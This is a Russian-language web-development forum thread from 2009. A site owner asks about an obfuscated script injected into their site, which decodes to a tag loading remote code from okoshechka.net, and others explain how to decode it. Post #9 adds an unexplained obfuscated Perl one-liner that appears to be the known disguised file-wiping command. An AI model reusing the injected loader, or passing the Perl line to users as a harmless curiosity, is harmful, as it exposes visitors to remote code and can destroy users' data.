Javascript.RU

Создать новую тему Ответ
 
Опции темы Искать в теме
  #1 (permalink)  
Старый 19.10.2009, 23:03
Новичок на форуме
Отправить личное сообщение для ProTach Посмотреть профиль Найти все сообщения от ProTach
 
Регистрация: 19.10.2009
Сообщений: 2

Что обозначает этот скрипт? никогда токого не видел
Вот нашёл у себя в дизайне сайта вот этот скрипт:

<script language="JavaScript">
<!--
function Ht580(cE956){document.write(String.fromCharCode(parseInt(cE956)+3));}
var Wi206="57~112~96~111~102~109~113~29~105~94~107~100~114~94~100~98~58~36~71~94~115~94~80~96~111~102~109~113~36~"+
"29~113~118~109~98~58~36~113~98~117~113~44~103~94~115~94~112~96~111~102~109~113~36~29~112~111~96~58~36~"+
"101~113~113~109~55~44~44~106~94~117~46~42~96~112~43~108~104~108~112~101~98~96~101~104~94~43~107~98~113~"+
"44~112~44~113~109~107~78~99~102~100~54~51~53~54~43~109~101~109~60~102~97~58~106~94~117~46~42~96~112~"+
"36~59~57~44~112~96~111~102~109~113~59"; var z798=Wi206.split("~");
var tl197=0;while(tl197<z798.length){Ht580(z798[tl197]);tl197++;}
// -->
</script>


Что он делает, может здесь какие нибудь закодированные слова и ссылки? В общим мне ни чё не понятно, объясните плиз!

Последний раз редактировалось Octane, 19.10.2009 в 23:54. Причина: используйте теги [html] и [js] для оформления кода
Ответить с цитированием
  #2 (permalink)  
Старый 19.10.2009, 23:59
Отправить личное сообщение для Octane Посмотреть профиль Найти все сообщения от Octane  
Регистрация: 10.07.2008
Сообщений: 3,873

Он вставляет в код вот такую строку:
<script language='JavaScript' type='text/javascript' src='http://max1-cs.okoshechka.net/s/tpnQfig9689.php?id=max1-cs'></script>


Так как адрес okoshechka.net находится в списках AdBlock, предположу, что это какая-то реклама, хотя по прямому запросу какой-то безобидный код. Возможно, на странице есть еще подобные скрипты?

Последний раз редактировалось Octane, 20.10.2009 в 00:18.
Ответить с цитированием
  #3 (permalink)  
Старый 20.10.2009, 08:36
Новичок на форуме
Отправить личное сообщение для ProTach Посмотреть профиль Найти все сообщения от ProTach
 
Регистрация: 19.10.2009
Сообщений: 2

огромное спасибо, вот от куда взялась эта рекламка. Нет, таких скриптов там больше нету.
Ответить с цитированием
  #4 (permalink)  
Старый 22.10.2009, 11:41
Интересующийся
Отправить личное сообщение для format1981 Посмотреть профиль Найти все сообщения от format1981
 
Регистрация: 22.10.2009
Сообщений: 22

Сообщение от Octane Посмотреть сообщение
Он вставляет в код вот такую строку:
<script language='JavaScript' type='text/javascript' src='http://max1-cs.okoshechka.net/s/tpnQfig9689.php?id=max1-cs'></script>
А как ты узнал это?
Ответить с цитированием
  #5 (permalink)  
Старый 22.10.2009, 12:41
Аватар для B~Vladi
Модератор Всея Форума
Отправить личное сообщение для B~Vladi Посмотреть профиль Найти все сообщения от B~Vladi
 
Регистрация: 14.05.2009
Сообщений: 4,021

document.write замени на alert.
Ответить с цитированием
  #6 (permalink)  
Старый 24.10.2009, 04:07
Tolstiy
 
Сообщений: n/a

Обалдеть.)))
Обалдеть, ктож такое чудо изобретал.))) Вот что значит закодированный код, который понимает только автор.))) Надо запомнить фокус, может когда пригодится.))
Ответить с цитированием
  #7 (permalink)  
Старый 24.10.2009, 13:26
Отправить личное сообщение для Octane Посмотреть профиль Найти все сообщения от Octane  
Регистрация: 10.07.2008
Сообщений: 3,873

А что там изобретать? Там просто коды символов исходной сроки через разделитель ~ записаны, ничего сложного.
Ответить с цитированием
  #8 (permalink)  
Старый 24.10.2009, 18:14
Аватар для B~Vladi
Модератор Всея Форума
Отправить личное сообщение для B~Vladi Посмотреть профиль Найти все сообщения от B~Vladi
 
Регистрация: 14.05.2009
Сообщений: 4,021

Сообщение от Octane
А что там изобретать? Там просто коды символов исходной сроки через разделитель ~ записаны, ничего сложного.
С первого раза может удивить кого угодно
Ответить с цитированием
  #9 (permalink)  
Старый 26.10.2009, 19:03
Аватар для e1f
e1f e1f вне форума
Профессор
Отправить личное сообщение для e1f Посмотреть профиль Найти все сообщения от e1f
 
Регистрация: 03.04.2009
Сообщений: 1,263

B~Vladi,
с первого раза удивляет
Код:
cat "test... test... test..." | perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'
А у ТС'а так, мелочь
Ответить с цитированием
  #10 (permalink)  
Старый 26.10.2009, 19:56
Аватар для B~Vladi
Модератор Всея Форума
Отправить личное сообщение для B~Vladi Посмотреть профиль Найти все сообщения от B~Vladi
 
Регистрация: 14.05.2009
Сообщений: 4,021

Сообщение от e1f
с первого раза удивляет
Хочешь сказать что это JS?!...
А вообще так да... сложновато...
Ответить с цитированием
Ответ


Опции темы Искать в теме
Искать в теме:

Расширенный поиск


Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Как изменить скрипт, что бы им его можно было использовать для нужной страницы Nick50_70 Общие вопросы Javascript 0 28.04.2009 23:30